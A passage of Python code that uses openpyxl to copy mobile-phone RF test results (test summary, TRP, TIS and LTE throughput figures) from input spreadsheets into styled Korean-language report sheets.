sheet_out.merge_cells('D13:D14')\n sheet_out['D13'] = sheet_in['D13'].value\n sheet_out['D15'] = sheet_in['D15'].value\n sheet_out.merge_cells('D16:D17')\n sheet_out['D16'] = sheet_in['D16'].value\n sheet_out.merge_cells('D18:D19')\n sheet_out['D18'] = sheet_in['D18'].value\n sheet_out['D20'] = sheet_in['D20'].value\n sheet_out['E6'] = sheet_in['E6'].value\n sheet_out['E7'] = sheet_in['E7'].value\n sheet_out['E8'] = sheet_in['E8'].value\n sheet_out['E9'] = sheet_in['E9'].value\n sheet_out['E10'] = sheet_in['E10'].value\n sheet_out['E11'] = sheet_in['E11'].value\n sheet_out['E12'] = sheet_in['E12'].value\n sheet_out['E13'] = sheet_in['E13'].value\n sheet_out['E14'] = sheet_in['E14'].value\n sheet_out['E15'] = sheet_in['E15'].value\n sheet_out['E16'] = sheet_in['E16'].value\n sheet_out['E17'] = sheet_in['E17'].value\n sheet_out['E18'] = sheet_in['E18'].value\n sheet_out['E19'] = sheet_in['E19'].value\n sheet_out['E20'] = sheet_in['E20'].value\n\n # sheet 21 ~ 24 handle\n sheet_out.merge_cells('B21:C24')\n sheet_out['B21'] = sheet_in['B21'].value\n sheet_out.merge_cells('D21:D22')\n sheet_out['D21'] = sheet_in['D21'].value\n sheet_out.merge_cells('D23:D24')\n sheet_out['D23'] = sheet_in['D23'].value\n sheet_out['E21'] = sheet_in['E21'].value\n sheet_out['E22'] = sheet_in['E22'].value\n sheet_out['E23'] = sheet_in['E23'].value\n sheet_out['E24'] = sheet_in['E24'].value\n\n #sheet 25 ~ 28 handle\n sheet_out.merge_cells('B25:C25')\n sheet_out['B25'] = sheet_in['B25'].value\n sheet_out.merge_cells('D25:E25')\n sheet_out['D25'] = sheet_in['D25'].value\n sheet_out.merge_cells('B26:C26')\n sheet_out['B26'] = sheet_in['B26'].value\n sheet_out.merge_cells('D26:E26')\n sheet_out['D26'] = sheet_in['D26'].value\n sheet_out.merge_cells('B27:C27')\n sheet_out['B27'] = '발열'\n sheet_out.merge_cells('D27:E27')\n sheet_out['D27'] = 'Live Streaming (충전/미충전), 게임(충전/미충전)'\n sheet_out.merge_cells('B28:E28')\n sheet_out['B28'] = sheet_in['B27'].value\n sheet_out.merge_cells('B29:C29')\n sheet_out['B29'] = sheet_in['B28'].value\n sheet_out.merge_cells('D29:E29')\n sheet_out['D29'] = sheet_in['D28'].value\n sheet_out.merge_cells('F29:H29')\n sheet_out['F29'] = sheet_in['F28'].value\n\n self.setPrintText('/s {}번 파일 \"시험결과요약\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n for i in range(6, 27):\n\n sheet_out['F' + str(i)] = temp_data[i-6][0]\n sheet_out['G' + str(i)] = temp_data[i-6][1]\n sheet_out['H' + str(i)] = temp_data[i-6][2]\n\n sheet_out['F28'] = temp_data[21][0]\n sheet_out['G28'] = temp_data[21][1]\n sheet_out['H28'] = temp_data[21][2]\n\n if self.opFlag:\n\n # all cell aligment adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['B2'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n sheet_out['B2'].alignment = self.general_alignment\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n sheet_width_list = [3.38, 9, 14.25, 8.5, 36.75, 11.25, 11.25, 11.25]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[2].height = 26.25\n\n # Set Pattern Fill\n sheet_out['B4'].fill = self.brown_fill\n sheet_out['D4'].fill = self.brown_fill\n sheet_out['F4'].fill = self.brown_fill\n sheet_out['F5'].fill = self.brown_fill\n sheet_out['G5'].fill = self.brown_fill\n sheet_out['H5'].fill = self.brown_fill\n\n for i in range(6, 28):\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n sheet_out['D' + str(i)].fill = self.gray_fill\n sheet_out['E' + str(i)].fill = self.gray_fill\n\n sheet_out['B28'].fill = self.dark_gray_fill\n sheet_out['F28'].fill = self.dark_gray_fill\n sheet_out['G28'].fill = self.dark_gray_fill\n sheet_out['H28'].fill = self.dark_gray_fill\n sheet_out['B29'].fill = self.gray_fill\n sheet_out['D29'].fill = self.gray_fill\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"시험결과요약\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # TRP Tab\n def trp_generate_data(self):\n # 절대값 abs\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_5g_trp = []\n list_lte_trp = []\n list_wcdma_trp = []\n\n # get data from wb_input\n sheet_in = wb_input['5G OTA']\n list_5g_trp.append(self.check_num(sheet_in['J5'].value))\n list_5g_trp.append(self.check_num(sheet_in['J6'].value))\n\n sheet_in = wb_input['LTE OTA']\n list_lte_trp.append(self.check_num(sheet_in['K17'].value))\n list_lte_trp.append(self.check_num(sheet_in['C17'].value))\n list_lte_trp.append(self.check_num(sheet_in['C10'].value))\n list_lte_trp.append(self.check_num(sheet_in['G17'].value))\n list_lte_trp.append(self.check_num(sheet_in['G10'].value))\n list_lte_trp.append(self.check_num(sheet_in['M17'].value))\n list_lte_trp.append(self.check_num(sheet_in['E17'].value))\n list_lte_trp.append(self.check_num(sheet_in['E10'].value))\n list_lte_trp.append(self.check_num(sheet_in['I17'].value))\n list_lte_trp.append(self.check_num(sheet_in['I10'].value))\n\n sheet_in = wb_input['WCDMA OTA']\n list_wcdma_trp.append(self.check_num(sheet_in['D9'].value))\n\n #option setting wb.output\n sheet_out = wb_output['TRP']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'TRP 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ SISO TRP'\n sheet_out['A4'] = ' - 5G'\n\n # sheet row 5 and 7 handle\n sheet_out['A5'] = '구분'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out['C5'] = '측정결과'\n sheet_out['D5'] = '비교'\n sheet_out['A6'] = 'CP-OFDM (n78)'\n sheet_out['B6'] = '16.86dBm(V50S)'\n sheet_out['C6'] = list_5g_trp[0]+'dBm'\n # sheet_out['D6'] = self.check_num(abs(round(abs(float(list_5g_trp[0]))-16.86, 2))) + 'dBm'\n sheet_out['D6'] = self.cal_comparison(16.86, list_5g_trp[0]) + 'dBm'\n sheet_out['A7'] = 'DFTs-OFDM (n78)'\n sheet_out['B7'] = '-'\n sheet_out['C7'] = list_5g_trp[1]+'dBm'\n sheet_out['D7'] = '-'\n\n # sheet row 8 and 15 handle\n sheet_out['A8'] = ' - LTE'\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준(RHP)'\n sheet_out['C9'] = '측정결과'\n sheet_out['D9'] = '비교'\n\n sheet_out['A10'] = 'Band 1 15M'\n sheet_out['B10'] = '14.00dBm'\n sheet_out['C10'] = list_lte_trp[0] + 'dBm'\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_lte_trp[0]))-14.00, 2))) + 'dBm'\n sheet_out['D10'] = self.cal_comparison(14.00, list_lte_trp[0]) + 'dBm'\n sheet_out['A11'] = 'Band 3 20M'\n sheet_out['B11'] = '15.00dBm'\n sheet_out['C11'] = list_lte_trp[1] + 'dBm'\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_lte_trp[1]))-15.00, 2))) + 'dBm'\n sheet_out['D11'] = self.cal_comparison(15.00, list_lte_trp[1]) + 'dBm'\n sheet_out['A12'] = 'Band 5 10M'\n sheet_out['B12'] = '13.50dBm'\n sheet_out['C12'] = list_lte_trp[2] + 'dBm'\n # sheet_out['D12'] = self.check_num(abs(round(abs(float(list_lte_trp[2]))-13.50, 2))) + 'dBm'\n sheet_out['D12'] = self.cal_comparison(13.50, list_lte_trp[2]) + 'dBm'\n sheet_out['A13'] = 'Band 7 20M'\n sheet_out['B13'] = '13.00dBm'\n sheet_out['C13'] = list_lte_trp[3] + 'dBm'\n # sheet_out['D13'] = self.check_num(abs(round(abs(float(list_lte_trp[3])) - 13.00, 2))) + 'dBm'\n sheet_out['D13'] = self.cal_comparison(13.00, list_lte_trp[3]) + 'dBm'\n sheet_out['A14'] = 'Band 7 10M'\n sheet_out['B14'] = '13.00dBm'\n sheet_out['C14'] = list_lte_trp[4] + 'dBm'\n # sheet_out['D14'] = self.check_num(abs(round(abs(float(list_lte_trp[4])) - 13.00, 2))) + 'dBm'\n sheet_out['D14'] = self.cal_comparison(13.00, list_lte_trp[4]) + 'dBm'\n\n # sheet row 15 and 17 handle\n sheet_out['A15'] = ' - WCDMA (납품검사 결과)'\n sheet_out['A16'] = '구분'\n sheet_out['B16'] = '기준(RHP)'\n sheet_out['C16'] = '측정결과'\n sheet_out['A17'] = 'Band 1'\n sheet_out['B17'] = '15.00dBm'\n sheet_out['C17'] = list_wcdma_trp[0] + 'dBm'\n # sheet_out['D17'] = self.check_num(abs(round(abs(float(list_wcdma_trp[0])) - 15.00, 2))) + 'dBm'\n sheet_out['D17'] = self.cal_comparison(15.00, list_wcdma_trp[0]) + 'dBm'\n\n # sheet row 19 and 27 handle\n sheet_out['A19'] = '▣ MIMO TRP'\n sheet_out['A20'] = ' - LTE'\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = '기준(RHP)'\n sheet_out['C21'] = '측정결과'\n sheet_out['A22'] = 'Band 1 15M'\n sheet_out['B22'] = '14.00dBm'\n sheet_out['C22'] = list_lte_trp[5] + 'dBm'\n # sheet_out['D22'] = self.check_num(abs(round(abs(float(list_lte_trp[5])) - 14.00, 2))) + 'dBm'\n sheet_out['D22'] = self.cal_comparison(14.00, list_lte_trp[5]) + 'dBm'\n sheet_out['A23'] = 'Band 3 20M'\n sheet_out['B23'] = '15.00dBm'\n sheet_out['C23'] = list_lte_trp[6] + 'dBm'\n # sheet_out['D23'] = self.check_num(abs(round(abs(float(list_lte_trp[6])) - 15.00, 2))) + 'dBm'\n sheet_out['D23'] = self.cal_comparison(15.00, list_lte_trp[6]) + 'dBm'\n sheet_out['A24'] = 'Band 5 10M'\n sheet_out['B24'] = '13.50dBm'\n sheet_out['C24'] = list_lte_trp[7]+'dBm'\n # sheet_out['D24'] = self.check_num(abs(round(abs(float(list_lte_trp[7])) - 13.50, 2))) + 'dBm'\n sheet_out['D24'] = self.cal_comparison(13.50, list_lte_trp[7]) + 'dBm'\n sheet_out['A25'] = 'Band 7 20M'\n sheet_out['B25'] = '13.00dBm'\n sheet_out['C25'] = list_lte_trp[8] + 'dBm'\n # sheet_out['D25'] = self.check_num(abs(round(abs(float(list_lte_trp[8])) - 13.00, 2))) + 'dBm'\n sheet_out['D25'] = self.cal_comparison(13.00, list_lte_trp[8]) + 'dBm'\n sheet_out['A26'] = 'Band 7 10M'\n sheet_out['B26'] = '13.00dBm'\n sheet_out['C26'] = list_lte_trp[9] + 'dBm'\n # sheet_out['D26'] = self.check_num(abs(round(abs(float(list_lte_trp[9])) - 13.00, 2))) + 'dBm'\n sheet_out['D26'] = self.cal_comparison(13.00, list_lte_trp[9]) + 'dBm'\n\n self.setPrintText('/s {}번 파일 \"TRP\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D26\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D7\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A9:D14\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A16:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A21:D26\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:D26\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 16.75, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [5, 9, 16, 21]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [6, 7, 10, 11, 12, 13, 14, 17, 22, 23, 24, 25, 26]:\n sheet_out['A'+str(i)].fill = self.gray_fill\n sheet_out['B'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"TRP\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # TIS Tab\n def tis_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_5g_tis = []\n list_lte_tis = []\n list_wcdma_tis = []\n\n # get data from wb_input\n sheet_in = wb_input['5G OTA']\n list_5g_tis.append(self.check_num(sheet_in['J7'].value))\n list_5g_tis.append(self.check_num(sheet_in['J8'].value))\n\n sheet_in = wb_input['LTE OTA']\n list_lte_tis.append(self.check_num(sheet_in['L17'].value))\n list_lte_tis.append(self.check_num(sheet_in['D17'].value))\n list_lte_tis.append(self.check_num(sheet_in['D10'].value))\n list_lte_tis.append(self.check_num(sheet_in['H17'].value))\n list_lte_tis.append(self.check_num(sheet_in['H10'].value))\n list_lte_tis.append(self.check_num(sheet_in['N17'].value))\n list_lte_tis.append(self.check_num(sheet_in['F17'].value))\n list_lte_tis.append(self.check_num(sheet_in['F10'].value))\n list_lte_tis.append(self.check_num(sheet_in['J17'].value))\n list_lte_tis.append(self.check_num(sheet_in['J10'].value))\n\n sheet_in = wb_input['WCDMA OTA']\n list_wcdma_tis.append(self.check_num(sheet_in['E9'].value))\n\n #option setting wb.output\n sheet_out = wb_output['TIS']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'TIS 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ SISO TIS'\n sheet_out['A4'] = ' - 5G'\n\n # sheet row 5 and 7 handle\n sheet_out['A5'] = '구분'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out['C5'] = '측정결과'\n sheet_out['D5'] = '비교'\n sheet_out['A6'] = 'SISO (n78)'\n sheet_out['B6'] = '-'\n sheet_out['C6'] = list_5g_tis[0] + 'dBm'\n sheet_out['D6'] = '-'\n\n # sheet row 8 and 14 handle\n sheet_out['A8'] = ' - LTE'\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준(RHP)'\n sheet_out['C9'] = '측정결과'\n sheet_out['D9'] = '비교'\n sheet_out['A10'] = 'Band 1 15M'\n sheet_out['B10'] = '-92.00dBm'\n sheet_out['C10'] = list_lte_tis[0] + 'dBm'\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_lte_tis[0])) - 92.00, 2))) + 'dBm'\n sheet_out['D10'] = self.cal_comparison(92.00, list_lte_tis[0]) + 'dBm'\n sheet_out['A11'] = 'Band 3 20M'\n sheet_out['B11'] = '-91.00dBm'\n sheet_out['C11'] = list_lte_tis[1] + 'dBm'\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_lte_tis[1])) - 91.00, 2))) + 'dBm'\n sheet_out['D11'] = self.cal_comparison(91.00, list_lte_tis[1]) + 'dBm'\n sheet_out['A12'] = 'Band 5 10M'\n sheet_out['B12'] = '-87.00dBm'\n sheet_out['C12'] = list_lte_tis[2] + 'dBm'\n # sheet_out['D12'] = self.check_num(abs(round(abs(float(list_lte_tis[2])) - 87.00, 2))) + 'dBm'\n sheet_out['D12'] = self.cal_comparison(87.00, list_lte_tis[2]) + 'dBm'\n sheet_out['A13'] = 'Band 7 20M'\n sheet_out['B13'] = '-90.00dBm'\n sheet_out['C13'] = list_lte_tis[3] + 'dBm'\n sheet_out['D13'] = self.check_num(abs(round(abs(float(list_lte_tis[3])) - 90.00, 2))) + 'dBm'\n sheet_out['D13'] = self.cal_comparison(90.00, list_lte_tis[3]) + 'dBm'\n sheet_out['A14'] = 'Band 7 10M'\n sheet_out['B14'] = '-93.00dBm'\n sheet_out['C14'] = list_lte_tis[4] + 'dBm'\n # sheet_out['D14'] = self.check_num(abs(round(abs(float(list_lte_tis[4])) - 93.00, 2))) + 'dBm'\n sheet_out['D14'] = self.cal_comparison(93.00, list_lte_tis[4]) + 'dBm'\n\n # sheet row 16 and 18 handle\n sheet_out['A15'] = ' - WCDMA (납품검사 결과)'\n sheet_out['A16'] = '구분'\n sheet_out['B16'] = '기준(RHP)'\n sheet_out['C16'] = '측정결과'\n sheet_out['D16'] = '비교'\n sheet_out['A17'] = 'Band 1'\n sheet_out['B17'] = '-104.00dBm'\n sheet_out['C17'] = list_wcdma_tis[0] + 'dBm'\n # sheet_out['D17'] = self.check_num(abs(round(abs(float(list_wcdma_tis[0])) - 104.00, 2))) + 'dBm'\n sheet_out['D17'] = self.cal_comparison(104.00, list_wcdma_tis[0]) + 'dBm'\n\n # sheet row 19 and 22 handle\n sheet_out['A19'] = '▣ MIMO TRP'\n sheet_out['A20'] = ' - 5G'\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = '기준(RHP)'\n sheet_out['C21'] = '측정결과'\n sheet_out['D21'] = '비교'\n sheet_out['A22'] = 'MIMO 4X4 (n78)'\n sheet_out['B22'] = '-'\n sheet_out['C22'] = list_5g_tis[1] + 'dBm'\n sheet_out['D22'] = '-'\n\n # sheet row 24 and 30 handle\n sheet_out['A24'] = ' - LTE'\n sheet_out['A25'] = '구분'\n sheet_out['B25'] = '기준(RHP)'\n sheet_out['C25'] = '측정결과'\n sheet_out['D25'] = '비교'\n sheet_out['A26'] = 'Band 1 15M'\n sheet_out['B26'] = '-86.00dBm'\n sheet_out['C26'] = list_lte_tis[5] + 'dBm'\n # sheet_out['D26'] = self.check_num(abs(round(abs(float(list_lte_tis[5])) - 86.00, 2))) + 'dBm'\n sheet_out['D26'] = self.cal_comparison(86.00, list_lte_tis[5]) + 'dBm'\n sheet_out['A27'] = 'Band 3 20M'\n sheet_out['B27'] = '-86.00dBm'\n sheet_out['C27'] = list_lte_tis[6] + 'dBm'\n # sheet_out['D27'] = self.check_num(abs(round(abs(float(list_lte_tis[6])) - 86.00, 2))) + 'dBm'\n sheet_out['D27'] = self.cal_comparison(86.00, list_lte_tis[6]) + 'dBm'\n sheet_out['A28'] = 'Band 5 10M'\n sheet_out['B28'] = '-82.50dBm'\n sheet_out['C28'] = list_lte_tis[7] + 'dBm'\n # sheet_out['D28'] = self.check_num(abs(round(abs(float(list_lte_tis[7])) - 82.50, 2))) + 'dBm'\n sheet_out['D28'] = self.cal_comparison(82.50, list_lte_tis[7]) + 'dBm'\n sheet_out['A29'] = 'Band 7 20M'\n sheet_out['B29'] = '-84.00dBm'\n sheet_out['C29'] = list_lte_tis[8] + 'dBm'\n # sheet_out['D29'] = self.check_num(abs(round(abs(float(list_lte_tis[8])) - 84.00, 2))) + 'dBm'\n sheet_out['D29'] = self.cal_comparison(84.00, list_lte_tis[8]) + 'dBm'\n sheet_out['A30'] = 'Band 7 10M'\n sheet_out['B30'] = '-87.00dBm'\n sheet_out['C30'] = list_lte_tis[9] + 'dBm'\n # sheet_out['D30'] = self.check_num(abs(round(abs(float(list_lte_tis[9])) - 87.00, 2))) + 'dBm'\n sheet_out['D30'] = self.cal_comparison(87.00, list_lte_tis[9]) + 'dBm'\n\n self.setPrintText('/s {}번 파일 \"TIS\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D30\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment\n sheet_out['A24'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D6\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A9:D14\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A16:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A21:D22\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A25:D30\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:D30\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n\n for i in [5, 9, 16, 21, 25]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [6, 10, 11, 12, 13, 14, 17, 22, 26, 27, 28, 29, 30]:\n sheet_out['A'+str(i)].fill = self.gray_fill\n sheet_out['B'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"TIS\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 속도 Tab\n def spd_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_lte_spd = []\n\n # get data from wb_input\n sheet_in = wb_input['LTE OTA']\n # MIMO\n list_lte_spd.append(self.check_num(sheet_in['I25'].value))\n list_lte_spd.append(self.check_num(sheet_in['J25'].value))\n list_lte_spd.append(self.check_num(sheet_in['K25'].value))\n list_lte_spd.append(self.check_num(sheet_in['F25'].value))\n list_lte_spd.append(self.check_num(sheet_in['G25'].value))\n list_lte_spd.append(self.check_num(sheet_in['H25'].value))\n list_lte_spd.append(self.check_num(sheet_in['C25'].value))\n list_lte_spd.append(self.check_num(sheet_in['D25'].value))\n list_lte_spd.append(self.check_num(sheet_in['E25'].value))\n list_lte_spd.append(self.check_num(sheet_in['L25'].value))\n list_lte_spd.append(self.check_num(sheet_in['M25'].value))\n list_lte_spd.append(self.check_num(sheet_in['N25'].value))\n list_lte_spd.append(self.check_num(sheet_in['O25'].value))\n list_lte_spd.append(self.check_num(sheet_in['P25'].value))\n list_lte_spd.append(self.check_num(sheet_in['Q25'].value))\n # CA\n list_lte_spd.append(self.check_num(sheet_in['C33'].value))\n list_lte_spd.append(self.check_num(sheet_in['D33'].value))\n list_lte_spd.append(self.check_num(sheet_in['E33'].value))\n list_lte_spd.append(self.check_num(sheet_in['F33'].value))\n list_lte_spd.append(self.check_num(sheet_in['G33'].value))\n list_lte_spd.append(self.check_num(sheet_in['H33'].value))\n list_lte_spd.append(self.check_num(sheet_in['I33'].value))\n list_lte_spd.append(self.check_num(sheet_in['J33'].value))\n list_lte_spd.append(self.check_num(sheet_in['K33'].value))\n list_lte_spd.append(self.check_num(sheet_in['L33'].value))\n list_lte_spd.append(self.check_num(sheet_in['M33'].value))\n list_lte_spd.append(self.check_num(sheet_in['N33'].value))\n list_lte_spd.append(self.check_num(sheet_in['O33'].value))\n list_lte_spd.append(self.check_num(sheet_in['P33'].value))\n list_lte_spd.append(self.check_num(sheet_in['Q33'].value))\n list_lte_spd.append(self.check_num(sheet_in['R33'].value))\n list_lte_spd.append(self.check_num(sheet_in['S33'].value))\n list_lte_spd.append(self.check_num(sheet_in['T33'].value))\n\n #option setting wb.output\n sheet_out = wb_output['속도']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = '속도 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ MIMO 속도'\n sheet_out['A4'] = ' - LTE'\n\n # sheet row 5 and 20 handle\n sheet_out['A5'] = '구분'\n sheet_out.merge_cells('B5:C5')\n sheet_out['B5'] = '기준(Free)'\n sheet_out['D5'] = '측정결과'\n sheet_out['E5'] = '비교'\n\n sheet_out.merge_cells('A6:A8')\n sheet_out['A6'] = 'Band 1 15M(MCS28)'\n sheet_out['B6'] = 'RSSI'\n sheet_out['B7'] = '속도(Absolute)'\n sheet_out['B8'] = 'BLER'\n sheet_out['C6'] = '-61.00dBm'\n sheet_out['C7'] = '87700Kbps'\n sheet_out['C8'] = '20.00%'\n sheet_out['D6'] = list_lte_spd[0] + 'dBm'\n sheet_out['D7'] = list_lte_spd[1] + 'Kbps'\n sheet_out['D8'] = list_lte_spd[2] + '%'\n # sheet_out['E6'] = self.check_num(abs(round(abs(float(list_lte_spd[0])) - 61.00, 2))) + 'dBm'\n # sheet_out['E7'] = self.check_num(abs(round(abs(float(list_lte_spd[1])) - 87700, 2))) + 'Kbps'\n # sheet_out['E8'] = self.check_num(abs(round(abs(float(list_lte_spd[2])) - 20.00, 2))) + '%'\n sheet_out['E6'] = self.cal_comparison(61.00, list_lte_spd[0]) + 'dBm'\n sheet_out['E7'] = self.cal_comparison(87700.00, list_lte_spd[1]) + 'Kbps'\n sheet_out['E8'] = self.cal_comparison(20.00, list_lte_spd[2]) + '%'\n\n sheet_out.merge_cells('A9:A11')\n sheet_out['A9'] = 'Band 3 20M(MCS28)'\n sheet_out['B9'] = 'RSSI'\n sheet_out['B10'] = '속도(Absolute)'\n sheet_out['B11'] = 'BLER'\n sheet_out['C9'] = '-61.00dBm'\n sheet_out['C10'] = '119900Kbps'\n sheet_out['C11'] = '20.00%'\n sheet_out['D9'] = list_lte_spd[3] + 'dBm'\n sheet_out['D10'] = list_lte_spd[4] + 'Kbps'\n sheet_out['D11'] = list_lte_spd[5] + '%'\n # sheet_out['E9'] = self.check_num(abs(round(abs(float(list_lte_spd[3])) - 61.00, 2))) + 'dBm'\n # sheet_out['E10'] = self.check_num(abs(round(abs(float(list_lte_spd[4])) - 119900, 2))) + 'Kbps'\n # sheet_out['E11'] = self.check_num(abs(round(abs(float(list_lte_spd[5])) - 20.00, 2))) + '%'\n sheet_out['E9'] = self.cal_comparison(61.00, list_lte_spd[3]) + 'dBm'\n sheet_out['E10'] = self.cal_comparison(119900.00, list_lte_spd[4]) + 'Kbps'\n sheet_out['E11'] = self.cal_comparison(20.00, list_lte_spd[5]) + '%'\n\n sheet_out.merge_cells('A12:A14')\n sheet_out['A12'] = 'Band 5 10M(MCS27)'\n sheet_out['B12'] = 'RSSI'\n sheet_out['B13'] = '속도(Absolute)'\n sheet_out['B14'] = 'BLER'\n sheet_out['C12'] = '-60.00dBm'\n sheet_out['C13'] = '50300Kbps'\n sheet_out['C14'] = '20.00%'\n sheet_out['D12'] = list_lte_spd[6] + 'dBm'\n sheet_out['D13'] = list_lte_spd[7] + 'Kbps'\n sheet_out['D14'] = list_lte_spd[8] + '%'\n # sheet_out['E12'] = self.check_num(abs(round(abs(float(list_lte_spd[6])) - 60.00, 2))) + 'dBm'\n # sheet_out['E13'] = self.check_num(abs(round(abs(float(list_lte_spd[7])) - 50300, 2))) + 'Kbps'\n # sheet_out['E14'] = self.check_num(abs(round(abs(float(list_lte_spd[8])) - 20.00, 2))) + '%'\n sheet_out['E12'] = self.cal_comparison(60.00, list_lte_spd[6]) + 'dBm'\n sheet_out['E13'] = self.cal_comparison(50300.00, list_lte_spd[7]) + 'Kbps'\n sheet_out['E14'] = self.cal_comparison(20.00, list_lte_spd[8]) + '%'\n\n 